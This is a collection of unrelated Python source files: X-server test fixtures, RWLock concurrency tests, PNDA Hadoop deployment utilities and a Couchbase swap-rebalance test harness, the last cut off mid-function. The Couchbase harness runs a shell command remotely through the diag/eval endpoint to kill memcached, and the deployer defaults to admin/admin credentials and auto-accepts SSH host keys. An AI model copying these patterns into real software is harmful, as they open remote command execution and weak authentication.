return self._spawn_window(path)
def groupconsistency(self):
groups = self.c.groups()
screens = self.c.screens()
seen = set()
for g in groups.values():
scrn = g["screen"]
if scrn is not None:
if scrn in seen:
raise AssertionError(
"Screen referenced from more than one group.")
seen.add(scrn)
assert screens[scrn]["group"] == g["name"]
assert len(seen) == len(screens), "Not all screens \
had an attached group."
@pytest.fixture(scope="session")
def xvfb():
with xcffib.testing.XvfbTest():
display = os.environ["DISPLAY"]
if not can_connect_x11(display):
raise OSError("Xvfb did not come up")
yield
@pytest.fixture(scope="session")
def display(xvfb): # noqa: F841
return os.environ["DISPLAY"]
@pytest.fixture(scope="session")
def xephyr(request, xvfb): # noqa: F841
kwargs = getattr(request, "param", {})
with Xephyr(**kwargs) as x:
yield x
@pytest.fixture(scope="function")
def manager(request, xephyr):
config = getattr(request, "param", BareConfig)
for attr in dir(default_config):
if not hasattr(config, attr):
setattr(config, attr, getattr(default_config, attr))
with tempfile.NamedTemporaryFile() as f:
sockfile = f.name
try:
manager = TestManager(sockfile, xephyr.display, request.config.getoption("--debuglog"))
manager.start(config)
yield manager
finally:
manager.terminate()
@pytest.fixture(scope="function")
def manager_nospawn(request, xephyr):
with tempfile.NamedTemporaryFile() as f:
sockfile = f.name
try:
manager = TestManager(sockfile, xephyr.display, request.config.getoption("--debuglog"))
yield manager
finally:
manager.terminate()
no_xinerama = pytest.mark.parametrize("xephyr", [{"xinerama": False}], indirect=True)
|
test_RWLock.py
|
import threading
from lox import RWLock
from copy import copy
from time import sleep, time
from collections import deque
SLEEP_TIME = 0.01
N_WORKERS = 5
rw_lock = None
resource = None
resp = None
def common_setup():
global rw_lock, resp
rw_lock = RWLock()
resp = deque()
def common_create_workers(func, n, *args):
threads = []
for i in range(n):
t = threading.Thread(target=func, args=args)
threads.append(t)
t_start = time()
for t in threads:
t.start()
return threads, t_start
def read_worker():
global rw_lock, resp
with rw_lock('r'):
local_copy = copy(resource)
sleep(SLEEP_TIME)
resp.append(local_copy)
return
def write_worker(val):
global rw_lock, resource
with rw_lock('w'):
resource = val
return
def test_RWLock_r():
global rw_lock, resource, resp
common_setup()
resource = 0
threads, t_start = common_create_workers(read_worker, N_WORKERS)
for t in threads:
t.join()
t_end = time()
t_diff = t_end-t_start
assert(N_WORKERS > 2)
# for this to be true, readers have to access at same time (good)
assert(t_diff < (N_WORKERS-1)*SLEEP_TIME)
for r in resp:
assert(r == resource)
def test_RWLock_w():
global rw_lock, resource
common_setup()
resource = 0
new_val = 5
threads_w1, t_start_w1 = common_create_workers(write_worker, 1, new_val)
for t in threads_w1:
t.join()
assert(resource == new_val)
def test_RWLock_rw():
global rw_lock, resource, resp
common_setup()
return
resource = 0
soln = [0, ]*N_WORKERS + [5, ]*N_WORKERS
threads_r1, t_start_r1 = common_create_workers(read_worker, N_WORKERS)
threads_w1, t_start_w1 = common_create_workers(write_worker, N_WORKERS, 5)
threads_r2, t_start_r2 = common_create_workers(read_worker, N_WORKERS)
for t in threads_r1:
t.join()
for t in threads_w1:
t.join()
for t in threads_r2:
t.join()
for r, s in zip(resp, soln):
assert(r == s)
def test_RWLock_timeout():
lock = RWLock()
assert(lock.acquire('r', timeout=0.01) is True)
assert(lock.acquire('w', timeout=0.01) is False)
assert(lock.acquire('r', timeout=0.01) is True)
lock.release('r')
lock.release('r')
assert(lock.acquire('w', timeout=0.01) is True)
assert(lock.acquire('w', timeout=0.01) is False)
assert(lock.acquire('r', timeout=0.01) is False)
lock.release('w')
def test_bathroom_example():
# Note: after the janitor exits, the remaining people are nondeterministic
sol = [
"p_0_enter",
"p_0_exit",
"j_enter",
"j_exit",
]
res = bathroom_example()[:4]
for r, s in zip(res, sol):
assert(r == s)
def bathroom_example():
"""
Scenario:
A janitor needs to clean a restroom, but is not allowed to enter until
all people are out of the restroom. How do we implement this?
"""
restroom = RWLock()
res = []
n_people = 5
sleep_time = 0.1
def janitor():
with restroom('w'): # block until the restroom is no longer occupied
res.append('j_enter')
print("(%0.3f s) Janitor entered the restroom" % (time() - t_start,))
sleep(sleep_time) # clean the restroom
res.append('j_exit')
print("(%0.3f s) Janitor exited the restroom" % (time() - t_start,))
def people(id):
if id == 0: # Get the starting time of execution for display purposes
global t_start
t_start = time()
with restroom('r'): # block if a janitor is in the restroom
res.append("p_%d_enter" % (id,))
print("(%0.3f s) Person %d entered the restroom" % (time() - t_start, id,))
sleep(sleep_time) # use the restroom
res.append("p_%d_exit" % (id,))
print("(%0.3f s) Person %d exited the restroom" % (time() - t_start, id,))
people_threads = [threading.Thread(target=people, args=(i,)) for i in range(n_people)]
janitor_thread = threading.Thread(target=janitor)
for i, person in enumerate(people_threads):
person.start() # Person i will now attempt to enter the restroom
sleep(sleep_time * 0.6) # wait for 60% the time a person spends in the restroom
if i == 0: # While the first person is in the restroom...
janitor_thread.start() # the janitor would like to enter. HOWEVER...
# A new person (until all n_people are done) enters every 0.5 seconds.
# Wait for all threads to finish
for t in people_threads:
t.join()
janitor_thread.join()
# The results will look like:
"""
Running Restroom Demo
(0.000 s) Person 0 entered the restroom
(0.100 s) Person 0 exited the restroom
(0.101 s) Janitor entered the restroom
(0.201 s) Janitor exited the restroom
(0.201 s) Person 1 entered the restroom
(0.202 s) Person 2 entered the restroom
(0.202 s) Person 3 entered the restroom
(0.243 s) Person 4 entered the restroom
(0.302 s) Person 1 exited the restroom
(0.302 s) Person 2 exited the restroom
(0.303 s) Person 3 exited the restroom
(0.343 s) Person 4 exited the restroom
"""
# While Person 0 is in the restroom, the Janitor is waiting to enter (at around 0.5000 s).
# While the Janitor is waiting, he doesn't let anyone else into the room.
# After Person 0, leaves the room, the Janitor enters.
# After cleaning, the Janitor leaves at the 2.000 second mark.
# Ever since the janitor was waiting (at 0.500 s), Person 1, Person 2,
# Person 3, and Person 4 have been lining up to enter.
# Now that the Janitor left the restroom, all the waiting people go in at the same time.
return res
if __name__ == "__main__":
print("Running Restroom Demo")
bathroom_example()
|
deployer_utils.py
|
"""
Name: deployer_utils.py
Purpose: Utility functions for general usage in the project
Author: PNDA team
Created: 21/03/2016
Copyright (c) 2016 Cisco and/or its affiliates.
This software is licensed to you under the terms of the Apache License, Version 2.0 (the "License").
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
The code, technical concepts, and all information contained herein, are the property of Cisco Technology, Inc.
and/or its affiliated entities, under various laws including copyright, international treaties, patent,
and/or contract. Any use of the material herein must be in accordance with the terms of the License.
All rights not expressly granted by the License are reserved.
Unless required by applicable law or agreed to separately in writing, software distributed under the
License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied.
"""
import os
import tarfile
from io import BytesIO
import logging
import traceback
import time
from threading import Thread
import requests
import spur
from pywebhdfs.webhdfs import PyWebHdfsClient
def get_nameservice(cm_host, cluster_name, service_name, user_name='admin', password='admin'):
request_url = 'http://%s:7180/api/v11/clusters/%s/services/%s/nameservices' % (cm_host,
cluster_name,
service_name)
result = requests.get(request_url, auth=(user_name, password))
nameservice = ""
if result.status_code == 200:
response = result.json()
if 'items' in response:
nameservice = response['items'][0]['name']
logging.debug("Found named service %s for %s", nameservice, service_name)
return nameservice
def update_hadoop_env(env):
# Update the env in a way that ensure values are only updated in the main descriptor and never removed
# so that any caller will always be able to query the values it expects to find in the env descriptor
# 1. copy the environment descriptor
# 2. update the temporary copy
# 3. push the temporary values into the main descriptor
tmp_env = dict(env)
logging.debug('Updating environment descriptor')
if env['hadoop_distro'] == 'CDH':
logging.error('CDH is not a supported hadoop distribution')
elif env['hadoop_distro'] == 'HDP':
fill_hadoop_env_hdp(tmp_env)
else:
logging.warning('Skipping update_hadoop_env for hadoop distro "%s"', env['hadoop_distro'])
logging.debug('Updated environment descriptor')
for key in tmp_env:
# Dictionary get/put operations are atomic so inherently thread safe and don't need a lock
env[key] = tmp_env[key]
logging.debug(env)
def monitor_hadoop_env(env, config):
while True:
try:
update_hadoop_env(env)
except Exception:
logging.error("Environment sync failed")
logging.error(traceback.format_exc())
sleep_seconds = config['environment_sync_interval']
logging.debug('Next environment sync will be in %s seconds', sleep_seconds)
time.sleep(sleep_seconds)
def fill_hadoop_env(env, config):
update_hadoop_env(env)
env_monitor_thread = Thread(target=monitor_hadoop_env, args=[env, config])
env_monitor_thread.daemon = True
env_monitor_thread.start()
def ambari_request(ambari, uri):
hadoop_manager_ip = ambari[0]
hadoop_manager_username = ambari[1]
hadoop_manager_password = ambari[2]
if uri.startswith("http"):
full_uri = uri
else:
full_uri = 'http://%s:8080/api/v1%s' % (hadoop_manager_ip, uri)
headers = {'X-Requested-By': hadoop_manager_username}
auth = (hadoop_manager_username, hadoop_manager_password)
return requests.get(full_uri, auth=auth, headers=headers).json()
def get_hdfs_hdp(ambari, cluster_name):
core_site = ambari_request(ambari, '/clusters/%s?fields=Clusters/desired_configs/core-site' % cluster_name)
config_version = core_site['Clusters']['desired_configs']['core-site']['tag']
core_site_config = ambari_request(ambari, '/clusters/%s/configurations/?type=core-site&tag=%s' % (cluster_name, config_version))
return core_site_config['items'][0]['properties']['fs.defaultFS']
def component_host(component_detail):
host_list = ''
for host_detail in component_detail['host_components']:
if host_list:
host_list += ','
host_list += host_detail['HostRoles']['host_name']
return host_list
def fill_hadoop_env_hdp(env):
hadoop_manager_ip = env['hadoop_manager_host']
hadoop_manager_username = env['hadoop_manager_username']
hadoop_manager_password = env['hadoop_manager_password']
ambari = (hadoop_manager_ip, hadoop_manager_username, hadoop_manager_password)
cluster_name = ambari_request(ambari, '/clusters')['items'][0]['Clusters']['cluster_name']
logging.debug('getting service list for %s', cluster_name)
env['cm_status_links'] = {}
env['name_node'] = get_hdfs_hdp(ambari, cluster_name)
services = ambari_request(ambari, '/clusters/%s/services' % cluster_name)['items']
for service in services:
service_name = service['ServiceInfo']['service_name']
env['cm_status_links']['%s' % service_name] = 'http://%s:8080/#/main/services/%s/summary' % (hadoop_manager_ip, service_name)
service_components = ambari_request(ambari, service['href'] + '/components')['items']
for component in service_components:
component_detail = ambari_request(ambari, component['href'])
role_name = component_detail['ServiceComponentInfo']['component_name']
if role_name == "NAMENODE":
env['webhdfs_host'] = '%s' % component_host(component_detail).split(',')[0]
env['webhdfs_port'] = '14000'
elif role_name == "RESOURCEMANAGER":
rm_host = component_host(component_detail)
if len(rm_host.split(',')) > 1:
main_rm_host = rm_host.split(',')[0]
backup_rm_host = rm_host.split(',')[1]
else:
main_rm_host = rm_host
backup_rm_host = None
env['yarn_resource_manager_host'] = '%s' % main_rm_host
env['yarn_resource_manager_port'] = '8088'
env['yarn_resource_manager_mr_port'] = '8050'
if backup_rm_host is not None:
env['yarn_resource_manager_host_backup'] = '%s' % component_host(component_detail)
env['yarn_resource_manager_port_backup'] = '8088'
env['yarn_resource_manager_mr_port_backup'] = '8050'
elif role_name == "NODEMANAGER":
env['yarn_node_managers'] = '%s' % component_host(component_detail)
elif role_name == "ZOOKEEPER_SERVER":
env['zookeeper_quorum'] = '%s' % component_host(component_detail)
env['zookeeper_port'] = '2181'
elif role_name == "HBASE_MASTER":
env['hbase_rest_server'] = '%s' % component_host(component_detail).split(',')[0]
env['hbase_rest_port'] = '20550'
env['hbase_thrift_server'] = '%s' % component_host(component_detail).split(',')[0]
elif role_name == "OOZIE_SERVER":
env['oozie_uri'] = 'http://%s:11000/oozie' % component_host(component_detail)
elif role_name == "HIVE_SERVER":
env['hive_server'] = '%s' % component_host(component_detail)
env['hive_port'] = '10001'
def tree(archive_filepath):
file_handle = file(archive_filepath, 'rb')
tar_file = tarfile.open(None, 'r', file_handle)
table = tar_file.getmembers()
root = {}
for member in table:
path = member.name.split('/')
node = root
for part in path:
if part not in node:
node[part] = {}
node = node[part]
return root
def canonicalize(path):
path = path.replace('\\', '/')
path = path.replace('//', '/')
return path
class HDFS(object):
def __init__(self, host, port, user):
self._hdfs = PyWebHdfsClient(
host=host, port=port, user_name=user, timeout=None)
logging.debug('webhdfs = %s@%s:%s', user, host, port)
def recursive_copy(self, local_path, remote_path, exclude=None, permission=755):
if exclude is None:
exclude = []
c_path = canonicalize(remote_path)
logging.debug('making %s', c_path)
self._hdfs.make_dir(c_path, permission=permission)
fs_g = os.walk(local_path)
for dpath, dnames, fnames in fs_g:
_, relative_path = dpath.split(local_path)
for dname in dnames:
if dname not in exclude:
c_path = canonicalize(
'%s/%s/%s' %
(remote_path, relative_path, dname))
logging.debug('making %s', c_path)
self._hdfs.make_dir(c_path, permission=permission)
for fname in fnames:
if fname not in exclude:
data = file(
canonicalize(
'%s/%s/%s' %
(local_path, relative_path, fname)), 'rb')
c_path = canonicalize(
'%s/%s/%s' %
(remote_path, relative_path, fname))
logging.debug('creating %s', c_path)
self._hdfs.create_file(c_path, data, overwrite=True, permission=permission)
data.close()
def make_dir(self, path, permission=755):
logging.debug('make_dir: %s', path)
self._hdfs.make_dir(canonicalize(path), permission=permission)
def create_file(self, data, remote_file_path, permission=755):
logging.debug('create_file: %s', remote_file_path)
sio = BytesIO(data)
self._hdfs.create_file(
canonicalize(remote_file_path),
sio,
overwrite=True,
permission=permission)
def append_file(self, data, remote_file_path):
logging.debug('append to: %s', remote_file_path)
self._hdfs.append_file(canonicalize(remote_file_path), data)
def stream_file_to_disk(self, remote_file_path, local_file_path):
chunk_size = 10*1024*1024
offset = 0
with open(local_file_path, 'wb') as dest_file:
data = self._hdfs.read_file(canonicalize(remote_file_path), offset=offset, length=chunk_size)
while True:
dest_file.write(data)
if len(data) < chunk_size:
break
offset += chunk_size
data = self._hdfs.read_file(canonicalize(remote_file_path), offset=offset, length=chunk_size)
def read_file(self, remote_file_path):
data = self._hdfs.read_file(canonicalize(remote_file_path))
return data
def remove(self, path, recursive=False):
logging.debug('remove: %s', path)
self._hdfs.delete_file_dir(canonicalize(path), recursive)
def file_exists(self, path):
try:
self._hdfs.get_file_dir_status(path)
return True
except:
return False
def exec_ssh(host, user, key, ssh_commands):
shell = spur.SshShell(
hostname=host,
username=user,
private_key_file=key,
missing_host_key=spur.ssh.MissingHostKey.accept)
with shell:
for ssh_command in ssh_commands:
logging.debug('Host - %s: Command - %s', host, ssh_command)
try:
shell.run(["bash", "-c", ssh_command])
except spur.results.RunProcessError as exception:
logging.error(
ssh_command +
" - error: " +
traceback.format_exc(exception))
def dict_to_props(dict_props):
props = []
for key, value in dict_props.items():
props.append('%s=%s' % (key, value))
return '\n'.join(props)
def dict_to_xml(dict_props):
xml_header = '<?xml version="1.0" encoding="UTF-8" ?>'
xml_string = '<configuration>'
for key, value in dict_props.items():
xml_string += '<property>' + \
'<name>' + key + '</name>' + \
'<value>' + str(value) + '</value>' + \
'</property>'
xml_string += '</configuration>'
return xml_header + xml_string
|
swaprebalance.py
|
import time
import datetime
import unittest
from TestInput import TestInputSingleton
import logger
from couchbase_helper.cluster import Cluster
from membase.api.rest_client import RestConnection, RestHelper
from membase.helper.bucket_helper import BucketOperationHelper
from membase.helper.cluster_helper import ClusterOperationHelper
from membase.helper.rebalance_helper import RebalanceHelper
from memcached.helper.data_helper import LoadWithMcsoda
from threading import Thread
from remote.remote_util import RemoteMachineShellConnection
from memcached.helper.data_helper import MemcachedClientHelper
from membase.api.exception import RebalanceFailedException
from basetestcase import BaseTestCase
from security.rbac_base import RbacBase
class SwapRebalanceBase(unittest.TestCase):
@staticmethod
def common_setup(self):
self.cluster_helper = Cluster()
self.log = logger.Logger.get_logger()
self.cluster_run = False
self.input = TestInputSingleton.input
self.servers = self.input.servers
serverInfo = self.servers[0]
rest = RestConnection(serverInfo)
if len({server.ip for server in self.servers}) == 1:
ip = rest.get_nodes_self().ip
for server in self.servers:
server.ip = ip
self.cluster_run = True
self.case_number = self.input.param("case_number", 0)
self.replica = self.input.param("replica", 1)
self.keys_count = self.input.param("keys-count", 1000)
self.load_ratio = self.input.param("load-ratio", 1)
self.ratio_expiry = self.input.param("ratio-expiry", 0.03)
self.ratio_deletes = self.input.param("ratio-deletes", 0.13)
self.num_buckets = self.input.param("num-buckets", 1)
self.failover_factor = self.num_swap = self.input.param("num-swap", 1)
self.num_initial_servers = self.input.param("num-initial-servers", 3)
self.fail_orchestrator = self.swap_orchestrator = self.input.param("swap-orchestrator", False)
self.do_access = self.input.param("do-access", True)
self.load_started = False
self.loaders = []
try:
# Clear the state from Previous invalid run
if rest._rebalance_progress_status() == 'running':
self.log.warning("rebalancing is still running, previous test should be verified")
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
self.log.info("============== SwapRebalanceBase setup was started for test #{0} {1}=============="\
.format(self.case_number, self._testMethodName))
SwapRebalanceBase.reset(self)
# Make sure the test is setup correctly
min_servers = int(self.num_initial_servers) + int(self.num_swap)
msg = "minimum {0} nodes required for running swap rebalance"
self.assertTrue(len(self.servers) >= min_servers, msg=msg.format(min_servers))
self.log.info('picking server : {0} as the master'.format(serverInfo))
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(self.servers)
info = rest.get_nodes_self()
rest.init_cluster(username=serverInfo.rest_username, password=serverInfo.rest_password)
rest.init_cluster_memoryQuota(memoryQuota=int(info.mcdMemoryReserved * node_ram_ratio))
SwapRebalanceBase.enable_diag_eval_on_non_local_hosts(self, serverInfo)
# Add built-in user
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin', self.servers[0])
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list, RestConnection(self.servers[0]), 'builtin')
if self.num_buckets > 10:
BaseTestCase.change_max_buckets(self, self.num_buckets)
self.log.info("============== SwapRebalanceBase setup was finished for test #{0} {1} =============="
.format(self.case_number, self._testMethodName))
SwapRebalanceBase._log_start(self)
except Exception as e:
self.cluster_helper.shutdown()
self.fail(e)
@staticmethod
def common_tearDown(self):
self.cluster_helper.shutdown()
test_failed = (hasattr(self, '_resultForDoCleanups') and len(self._resultForDoCleanups.failures or self._resultForDoCleanups.errors)) \
or (hasattr(self, '_exc_info') and self._exc_info()[1] is not None)
if test_failed and TestInputSingleton.input.param("stop-on-failure", False)\
or self.input.param("skip_cleanup", False):
self.log.warning("CLEANUP WAS SKIPPED")
else:
SwapRebalanceBase.reset(self)
SwapRebalanceBase._log_finish(self)
# Remove rbac user in teardown
try:
role_del = ['cbadminbucket']
RbacBase().remove_user_role(role_del, RestConnection(
self.servers[0]))
except:
pass
@staticmethod
def reset(self):
self.log.info("============== SwapRebalanceBase cleanup was started for test #{0} {1} =============="\
.format(self.case_number, self._testMethodName))
self.log.info("Stopping load in Teardown")
SwapRebalanceBase.stop_load(self.loaders)
for server in self.servers:
rest = RestConnection(server)
if rest._rebalance_progress_status() == 'running':
self.log.warning("rebalancing is still running, test should be verified")
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self)
for server in self.servers:
ClusterOperationHelper.cleanup_cluster([server])
if server.data_path:
rest = RestConnection(server)
rest.set_data_path(data_path=server.data_path)
ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self)
self.log.info("============== SwapRebalanceBase cleanup was finished for test #{0} {1} =============="\
.format(self.case_number, self._testMethodName))
@staticmethod
def enable_diag_eval_on_non_local_hosts(self, master):
"""
Enable diag/eval to be run on non-local hosts.
:param master: Node information of the master node of the cluster
:return: Nothing
"""
remote = RemoteMachineShellConnection(master)
output, error = remote.enable_diag_eval_on_non_local_hosts()
if "ok" not in output:
self.log.error("Error in enabling diag/eval on non-local hosts on {}. {}".format(master.ip, output))
raise Exception("Error in enabling diag/eval on non-local hosts on {}".format(master.ip))
else:
self.log.info("Enabled diag/eval for non-local hosts from {}".format(master.ip))
@staticmethod
def _log_start(self):
try:
msg = "{0} : {1} started ".format(datetime.datetime.now(), self._testMethodName)
RestConnection(self.servers[0]).log_client_error(msg)
except:
pass
@staticmethod
def _log_finish(self):
try:
msg = "{0} : {1} finished ".format(datetime.datetime.now(), self._testMethodName)
RestConnection(self.servers[0]).log_client_error(msg)
except:
pass
@staticmethod
def sleep(self, timeout=1, message=""):
self.log.info("sleep for {0} secs. {1} ...".format(timeout, message))
time.sleep(timeout)
@staticmethod
def _create_default_bucket(self, replica=1):
name = "default"
master = self.servers[0]
rest = RestConnection(master)
helper = RestHelper(RestConnection(master))
if not helper.bucket_exists(name):
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(self.servers)
info = rest.get_nodes_self()
available_ram = info.memoryQuota * node_ram_ratio
rest.create_bucket(bucket=name, ramQuotaMB=int(available_ram), replicaNumber=replica)
ready = BucketOperationHelper.wait_for_memcached(master, name)
self.assertTrue(ready, msg="wait_for_memcached failed")
self.assertTrue(helper.bucket_exists(name),
msg="unable to create {0} bucket".format(name))
@staticmethod
def _create_multiple_buckets(self, replica=1):
master = self.servers[0]
created = BucketOperationHelper.create_multiple_buckets(master, replica, howmany=self.num_buckets)
self.assertTrue(created, "unable to create multiple buckets")
rest = RestConnection(master)
buckets = rest.get_buckets()
for bucket in buckets:
ready = BucketOperationHelper.wait_for_memcached(master, bucket.name)
self.assertTrue(ready, msg="wait_for_memcached failed")
# Used for items verification active vs. replica
@staticmethod
def items_verification(test, master):
rest = RestConnection(master)
# Verify items count across all node
timeout = 600
for bucket in rest.get_buckets():
verified = RebalanceHelper.wait_till_total_numbers_match(master, bucket.name, timeout_in_seconds=timeout)
test.assertTrue(verified, "Lost items!!.. failing test in {0} secs".format(timeout))
@staticmethod
def start_load_phase(self, master):
loaders = []
rest = RestConnection(master)
for bucket in rest.get_buckets():
loader = dict()
loader["mcsoda"] = LoadWithMcsoda(master, self.keys_count, bucket=bucket.name,
rest_password=master.rest_password, prefix=str(bucket.name), port=8091)
loader["mcsoda"].cfg["exit-after-creates"] = 1
loader["mcsoda"].cfg["json"] = 0
loader["thread"] = Thread(target=loader["mcsoda"].load_data, name='mcloader_' + bucket.name)
loader["thread"].daemon = True
loaders.append(loader)
for loader in loaders:
loader["thread"].start()
return loaders
@staticmethod
def start_access_phase(self, master):
loaders = []
rest = RestConnection(master)
for bucket in rest.get_buckets():
loader = dict()
loader["mcsoda"] = LoadWithMcsoda(master, self.keys_count // 2, bucket=bucket.name,
rest_password=master.rest_password, prefix=str(bucket.name), port=8091)
loader["mcsoda"].cfg["ratio-sets"] = 0.8
loader["mcsoda"].cfg["ratio-hot"] = 0.2
loader["mcsoda"].cfg["ratio-creates"] = 0.5
loader["mcsoda"].cfg["ratio-deletes"] = self.ratio_deletes
loader["mcsoda"].cfg["ratio-expirations"] = self.ratio_expiry
loader["mcsoda"].cfg["json"] = 0
loader["thread"] = Thread(target=loader["mcsoda"].load_data, name='mcloader_' + bucket.name)
loader["thread"].daemon = True
loaders.append(loader)
for loader in loaders:
loader["thread"].start()
return loaders
@staticmethod
def stop_load(loaders, do_stop=True):
if do_stop:
for loader in loaders:
loader["mcsoda"].load_stop()
for loader in loaders:
if do_stop:
loader["thread"].join(300)
else:
loader["thread"].join()
@staticmethod
def create_buckets(self):
if self.num_buckets == 1:
SwapRebalanceBase._create_default_bucket(self, replica=self.replica)
else:
SwapRebalanceBase._create_multiple_buckets(self, replica=self.replica)
@staticmethod
def verification_phase(test, master):
# Stop loaders
SwapRebalanceBase.stop_load(test.loaders)
test.log.info("DONE DATA ACCESS PHASE")
test.log.info("VERIFICATION PHASE")
rest = RestConnection(master)
servers_in_cluster = []
nodes = rest.get_nodes()
for server in test.servers:
for node in nodes:
if node.ip == server.ip and node.port == server.port:
servers_in_cluster.append(server)
time.sleep(60)
SwapRebalanceBase.items_verification(test, master)
@staticmethod
def _common_test_body_swap_rebalance(self, do_stop_start=False):
master = self.servers[0]
rest = RestConnection(master)
num_initial_servers = self.num_initial_servers
creds = self.input.membase_settings
intial_severs = self.servers[:num_initial_servers]
self.log.info("CREATE BUCKET PHASE")
SwapRebalanceBase.create_buckets(self)
# Cluster all starting set of servers
self.log.info("INITIAL REBALANCE PHASE")
status, servers_rebalanced = RebalanceHelper.rebalance_in(intial_severs, len(intial_severs) - 1)
self.assertTrue(status, msg="Rebalance was failed")
self.log.info("DATA LOAD PHASE")
self.loaders = SwapRebalanceBase.start_load_phase(self, master)
# Wait till load phase is over
SwapRebalanceBase.stop_load(self.loaders, do_stop=False)
self.log.info("DONE LOAD PHASE")
# Start the swap rebalance
current_nodes = RebalanceHelper.getOtpNodeIds(master)
self.log.info("current nodes : {0}".format(current_nodes))
toBeEjectedNodes = RebalanceHelper.pick_nodes(master, howmany=self.num_swap)
optNodesIds = [node.id for node in toBeEjectedNodes]
if self.swap_orchestrator:
status, content = ClusterOperationHelper.find_orchestrator(master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}".\
format(status, content))
if self.num_swap is len(current_nodes):
optNodesIds.append(content)
else:
optNodesIds[0] = content
for node in optNodesIds:
self.log.info("removing node {0} and rebalance afterwards".format(node))
new_swap_servers = self.servers[num_initial_servers:num_initial_servers + self.num_swap]
for server in new_swap_servers:
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster"
self.assertTrue(otpNode, msg.format(server.ip))
if self.swap_orchestrator:
rest = RestConnection(new_swap_servers[0])
master = new_swap_servers[0]
if self.do_access:
self.log.info("DATA ACCESS PHASE")
self.loaders = SwapRebalanceBase.start_access_phase(self, master)
self.log.info("SWAP REBALANCE PHASE")
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],
ejectedNodes=optNodesIds)
if do_stop_start:
# Rebalance is stopped at 20%, 40% and 60% completion
retry = 0
for expected_progress in (20, 40, 60):
self.log.info("STOP/START SWAP REBALANCE PHASE WITH PROGRESS {0}%".
format(expected_progress))
while True:
progress = rest._rebalance_progress()
if progress < 0:
self.log.error("rebalance progress code : {0}".format(progress))
break
elif progress == 100:
self.log.warning("Rebalance has already reached 100%")
break
elif progress >= expected_progress:
self.log.info("Rebalance will be stopped with {0}%".format(progress))
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
SwapRebalanceBase.sleep(self, 20)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],
ejectedNodes=optNodesIds)
break
elif retry > 100:
break
else:
retry += 1
SwapRebalanceBase.sleep(self, 1)
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(optNodesIds))
SwapRebalanceBase.verification_phase(self, master)
@staticmethod
def _common_test_body_failed_swap_rebalance(self):
master = self.servers[0]
rest = RestConnection(master)
num_initial_servers = self.num_initial_servers
creds = self.input.membase_settings
intial_severs = self.servers[:num_initial_servers]
self.log.info("CREATE BUCKET PHASE")
SwapRebalanceBase.create_buckets(self)
# Cluster all starting set of servers
self.log.info("INITIAL REBALANCE PHASE")
status, servers_rebalanced = RebalanceHelper.rebalance_in(intial_severs, len(intial_severs) - 1)
self.assertTrue(status, msg="Rebalance was failed")
self.log.info("DATA LOAD PHASE")
self.loaders = SwapRebalanceBase.start_load_phase(self, master)
# Wait till load phase is over
SwapRebalanceBase.stop_load(self.loaders, do_stop=False)
self.log.info("DONE LOAD PHASE")
# Start the swap rebalance
current_nodes = RebalanceHelper.getOtpNodeIds(master)
self.log.info("current nodes : {0}".format(current_nodes))
toBeEjectedNodes = RebalanceHelper.pick_nodes(master, howmany=self.num_swap)
optNodesIds = [node.id for node in toBeEjectedNodes]
if self.swap_orchestrator:
status, content = ClusterOperationHelper.find_orchestrator(master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}".\
format(status, content))
# When swapping all the nodes
if self.num_swap is len(current_nodes):
optNodesIds.append(content)
else:
optNodesIds[0] = content
for node in optNodesIds:
self.log.info("removing node {0} and rebalance afterwards".format(node))
new_swap_servers = self.servers[num_initial_servers:num_initial_servers + self.num_swap]
for server in new_swap_servers:
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster"
self.assertTrue(otpNode, msg.format(server.ip))
if self.swap_orchestrator:
rest = RestConnection(new_swap_servers[0])
master = new_swap_servers[0]
self.log.info("DATA ACCESS PHASE")
self.loaders = SwapRebalanceBase.start_access_phase(self, master)
self.log.info("SWAP REBALANCE PHASE")
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],
ejectedNodes=optNodesIds)
SwapRebalanceBase.sleep(self, 10, "Rebalance should start")
self.log.info("FAIL SWAP REBALANCE PHASE @ {0}".format(self.percentage_progress))
reached = RestHelper(rest).rebalance_reached(self.percentage_progress)
if reached and RestHelper(rest).is_cluster_rebalanced():
# handle situation when rebalance failed at the beginning
self.log.error('seems rebalance failed!')
rest.print_UI_logs()
self.fail("rebalance failed even before killing memcached")
bucket = rest.get_buckets()[0].name
pid = None
if self.swap_orchestrator and not self.cluster_run:
# get PID via remote connection if master is a new node
shell = RemoteMachineShellConnection(master)
pid = shell.get_memcache_pid()
shell.disconnect()
else:
times = 2
if self.cluster_run:
times = 20
for i in range(times):
try:
_mc = MemcachedClientHelper.direct_client(master, bucket)
pid = _mc.stats()["pid"]
break
except (EOFError, KeyError) as e:
self.log.error("{0}.Retry in 2 sec".format(e))
SwapRebalanceBase.sleep(self, 2)
if pid is None:
# sometimes pid is not returned by mc.stats()
shell = RemoteMachineShellConnection(master)
pid = shell.get_memcache_pid()
shell.disconnect()
if pid is None:
self.fail("impossible to get a PID")
command = "os:cmd(\"kill -9 {0} \")".format(pid)
self.log.info(command)
killed = rest.diag_eval(command)
self.log.info("killed {0}:{1}?? {2} ".format(master.ip, master.port, killed))
self.log.info("sleep for 10 sec after kill memcached")
SwapRebalanceBase.sleep(self, 10)
# we can't get stats for new node when rebalance falls
if not self.swap_orchestrator:
